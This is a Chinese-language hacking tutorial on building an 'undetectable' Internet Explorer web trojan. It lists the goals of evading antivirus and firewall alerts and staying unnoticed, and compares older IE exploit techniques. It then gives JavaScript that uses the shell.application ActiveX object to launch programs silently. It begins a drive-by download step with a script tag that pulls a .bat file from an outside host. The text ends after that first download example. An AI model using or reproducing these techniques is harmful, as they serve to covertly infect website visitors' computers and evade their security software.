打造完美的IE網頁木馬

　　既然要打造完美的ＩＥ網頁木馬，首先就必須給我們的完美製定一個標準，我個人認為一個完美的ＩＥ網頁木馬至少應具備下列四項特徵：

　　一：可以躲過殺毒軟體的追殺；

　　二：可以避開網路防火牆的警示；

　　三：能夠適用於多數的ＷＩＮＤＯＷＳ作業系統（主要包括ＷＩＮ９８、ＷＩＮＭＥ、ＷＩＮ２０００、ＷＩＮＸＰ、ＷＩＮ２００３）中的多數ＩＥ版本（主要包括ＩＥ５．０、ＩＥ５．５、ＩＥ６．０），最好能打倒ＳＰ補丁；

　　四：讓瀏覽者不容易發覺ＩＥ變化，即可以悄無聲息，從而可以長久不被發現。
　　（注意以上四點只是指網頁本身而言，但不包括你的木馬程式，也就是說我們的網頁木馬只是負責運行指定的木馬程式，至於你的木馬程式的好壞只有你自己去選擇啦！別找我要，我不會寫的哦！）

　　滿足以上四點我想才可以讓你的馬兒更青春更長久，跑的更歡更快……

　　看了上面的幾點你是不是心動拉？別急，我們還是先侃侃現有的各種ＩＥ網頁木馬的不足吧！

　　第一種：利用古老的MIME漏洞的ＩＥ網頁木馬這種木馬現在還在流行，但因為此漏洞太過古老且適用的ＩＥ版本較少，而當時影響又太大，補丁差不多都補上啦，因此這種木馬的種植成功率比較低。

　　第二種：利用com.ms.activeX.ActiveXComponent漏洞，結合ＷＳＨ及ＦＳＯ控制項的ＩＥ網頁木馬雖然com.ms.activeX.ActiveXComponent漏洞廣泛存在於多數ＩＥ版本中，是一個比較好的漏洞，利用價值非常高，但卻因為它結合了流行的病毒調用的ＷＳＨ及ＦＳＯ控制項，使其雖說可以避開網路防火牆的警示，可逃不脫殺毒軟體的追捕（如諾頓）。

　　第三種：利用OBJECT物件類型確認漏洞（Ｏｂｊｅｃｔ　Ｄａｔａ　Ｒｅｍｏｔｅ）並結合ＷＳＨ及ＦＳＯ控制項的ＩＥ網頁木馬（典型的代表有動鯊網頁木馬產生器）

　　此種木馬最大的優點是適應的ＩＥ版本多，且漏洞較新，但卻有如下不足：

　　１、因為此漏洞要調用Mshta.exe來訪問網路下載木馬程式，所以會引起防火牆警示（如天網防火牆）；

　　２、如果此ＩＥ網頁木馬又利用了ＷＳＨ及ＦＳＯ控制項，同樣逃不脫殺毒軟體的追捕（如諾頓），而動鯊網頁木馬又恰恰使用了ＷＳＨ及ＦＳＯ控制項，歎口氣……可惜呀……？

　　３、再有就是這個漏洞需要網頁伺服器支援動態網頁如ＡＳＰ、ＪＳＰ、ＣＧＩ等，這就影響了它的發揮，畢竟現在的免費穩定的動態網頁空間是少之又少；雖說此漏洞也可利用郵件ＭＩＭＥ的形式（見我在安全焦點上發表的文章：《由錯誤MIME漏洞的利用想到的......---IE Object Data 資料遠程執行漏洞的利用》http://www.xfocus.net/articles/200309/607.html）來利用，但經測試發現對ＩＥ６．０不起作用。

　　看到上面的分析你是不是有了這種感覺：千軍易得，一將難求，馬兒成群，奈何千裡馬難尋！別急，下面讓我帶這大家一起打造我心中的完美ＩＥ網頁木馬。

　　首先要躲過殺毒軟體的追殺，我們就不能利用ＷＳＨ和ＦＳＯ控制項，因為只要利用了ＷＳＨ和ＦＳＯ控制項就一定逃不脫“諾頓”的追殺，這可叫我們該如何是好？！別急，經過我的努力工作（說真的我也是在研究ＡＳＰ木馬時偶然發現的靈感）終於我有找到了一個可以用的控制項，那就是shell.application，並且它可是經過了安全認證的，可以在“我的電腦”域中的網頁中暢通無阻的執行，比ＷＳＨ和ＦＳＯ更容易得到執行許可權（利用跨域漏洞即可），請看下面javascript代碼：

＜SCRIPT LANGUAGE="javascript" type="text/javascript"＞
var shell=new ActiveXObject("shell.application");
shell.namespace("c:\Windows\").items().item("Notepad.exe").invokeverb();
＜/SCRIPT＞

　　儲存為test.htm後開啟看是否自動開啟了記事本程式，而且不會象ＷＳＨ和ＦＳＯ那樣出現是否允許啟動並執行提示框，是不是有點興趣啦？現在我們已可以運行所有已知路徑的程式，但我們要求運行我們自己的木馬程式，所以還要求把我們的木馬程式下載到瀏覽者的電腦上並找出它的位置。我們一個個來解決：

　　１、下載木馬程式到瀏覽者的電腦中

　　這一點可以有很多解決方案，比如我以前提到的ＷＩＮＤＯＷＳ協助檔案訪問協議下載任意檔案漏洞（its:），不過這次我們不用它，再教大家兩個更好的下載方法：

　　例一：利用SCRIPT標籤，代碼如下：

＜SCRIPT LANGUAGE="icyfoxlovelace" src="http://www.godog.y365.com/wodemuma/icyfox.bat"＞＜/SCRIPT＞